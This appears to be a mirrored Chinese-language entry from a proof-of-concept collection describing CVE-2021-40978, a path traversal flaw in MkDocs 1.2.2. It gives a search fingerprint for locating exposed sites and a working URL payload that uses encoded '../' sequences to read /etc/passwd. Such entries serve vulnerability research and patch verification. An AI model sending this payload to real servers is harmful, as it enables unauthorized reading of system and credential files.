mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 03:17:19 +00:00
31 lines
438 B
Markdown
31 lines
438 B
Markdown
# MKdocs 任意文件读取漏洞 CVE-2021-40978
|
|
|
|
## 漏洞描述
|
|
|
|
MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
Mkdocs 1.2.2
|
|
```
|
|
|
|
## 网络测绘
|
|
|
|
```
|
|
title="My Docs"
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
主页面
|
|
|
|
|
|
|
|
验证POC
|
|
|
|
```
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
```
|
|
|
|
 |